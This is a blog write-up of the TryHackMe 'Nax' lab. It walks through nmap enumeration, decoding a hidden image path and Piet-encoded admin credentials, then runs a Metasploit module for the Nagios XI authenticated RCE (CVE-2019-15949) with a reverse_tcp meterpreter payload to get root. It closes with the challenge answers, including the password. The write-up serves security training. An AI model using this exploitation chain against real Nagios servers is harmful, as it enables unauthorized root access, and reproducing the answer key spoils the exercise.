Supasuge's Blog

Aspiring Information Technology/Cybersecurity Professional

Nax - TryHackMe Writeup

Posted on in TryHackMe • 1016 words • 5 minute read

Enumeration

nmap -p- --min-rate 10000 --open 10.10.222.20

Ports open: 22, 25, 80, 443

Moving on to Service Version/TCP scan with vuilnerability detections scripts + OS detection:

sudo nmap -p22,25,80,443 -sCVT -O 10.10.222.20   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-04 23:45 EDT
Nmap scan report for 10.10.222.20
Host is up (0.33s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 62:1d:d9:88:01:77:0a:52:bb:59:f9:da:c1:a6:e3:cd (RSA)
|   256 af:67:7d:24:e5:95:f4:44:72:d1:0c:39:8d:cc:21:15 (ECDSA)
|_  256 20:28:15:ef:13:c8:9f:b8:a7:0f:50:e6:2f:3b:1e:57 (ED25519)
25/tcp  open  smtp     Postfix smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2020-03-23T23:42:04
|_Not valid after:  2030-03-21T23:42:04
|_smtp-commands: ubuntu.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
| ssl-cert: Subject: commonName=192.168.85.153/organizationName=Nagios Enterprises/stateOrProvinceName=Minnesota/countryName=US
| Not valid before: 2020-03-24T00:14:58
|_Not valid after:  2030-03-22T00:14:58
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: 400 Bad Request
| tls-alpn: 
|_  http/1.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (93%), Linux 3.10 (93%), Linux 3.18 (93%), Linux 3.19 (93%), Linux 3.2 - 4.9 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: Host:  ubuntu.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Ubuntu host Port 22(SSH): Version 7.2p2 Port 25: Postfix SMTPd

  • CommonName:ubuntu Port 80: Apache httpd 2.4.18
  • CVE-2019-0211 Apache 2.4.17 < 2.4.38 Local privilege escalation Port 443: Same as port 80

Port 80

I then opened up firefox and check the site on port 80, and 443.

nagiosxi As you can see we found the /nagiosxi path from the source code.

Also, We see the line “Welcome to elements” followed by abbreviations from the periodic tables. At first, I didn’t even notice this however It didn’t occur to me until after I was not able to find anything useful from directory enumeration and SMTP enumeration.

Using this information, I searched for a list of abbreviations from the periodic tables…. After writing a short python script with itertools to gather the different combinations and trying directory brute forcing again… nothin. Damn. After scratching my head for bit and not getting anything back from trying to enumerate SMTP. I came back to the webpage decided to try to convert the Elements listed above to their corresponding element number then convert them to ASCII characters:

python3 -c "print(''.join([chr(i) for i in [47, 80, 73, 51, 84, 46, 80, 78, 103]]))"
/PI3T.PNg

This brought us to a .png image(name shown above), from here I decided to download so I can try and run exiftools on the image and see if I can’t find any useful information etc, as the picture doesn’t really give much away. After running the tool, I was able to find the Author of the photo; Artist: Piet Mandrian….. Nice!

After a quick google search of piet, one of the first pages was for an esolang (esoteric language) called Piet. Piet is described as a stack-based esoteric programming language in which programs look like abstract Paintings. This fits the picture we downloaded, so I then looked up a online translator for Piet.

After running the image through the interpreter, we successfully got what looks like the admin username/password to then login as, nice!

After logging in, we are able to see that the Version of the version of Nagios XI in use is version 5.5.6.

CVE-2019–15949 Nagios 5.6.6 and prior allows remote command execution as root. The exploit requires access to the server as the nagios user. Or access as the admin user via the web interface. The getprofile.sh script invoked by downloading a system profile is executed as root via a passwordless sudo entry; the script executes check_plugin, which is owned by the nagios user. A user logged into NagiosXI with permissions to modify plugins, or the nagios user on the server, can modify the check_plugin executable and inseart malicious commands to execute as root.

To get root on this machine, you simply need to run the correct metasploit exploit, which if you selected the CVE above… will give you a shell as root!

$ msfconsole -q
[*] Starting persistent handler(s)...
msf5 > search CVE-2019-15949

Matching Modules
================

   #  Name                                            Disclosure Date  Rank       Check  Description
   -  ----                                            ---------------  ----       -----  -----------
   0  exploit/linux/http/nagios_xi_authenticated_rce  2019-07-29       excellent  Yes    Nagios XI Authenticated Remote Command Execution


msf5 > use 0
msf5 exploit(linux/http/nagios_xi_authenticated_rce) > show options

Module options (exploit/linux/http/nagios_xi_authenticated_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       Password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path to NagiosXI
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   nagiosadmin      yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux (x64)


msf5 exploit(linux/http/nagios_xi_authenticated_rce) > exploit
# shell as root!
Questions

What hidden file did you find?

/PI3T.PNg

Who is the creator of the file?

Piet Mandrian

What is the username found?

nagiosadmin

What is the password you found?

n3p3UQ&9BjLp4$7uhWdY

What is the CVE number for this vulnerability? This will be in the format: CVE-0000-0000

CVE-2019-15949

What is the full path of the exploit on msfconsole?

exploit/linux/http/nagios_xi_authenticated_rce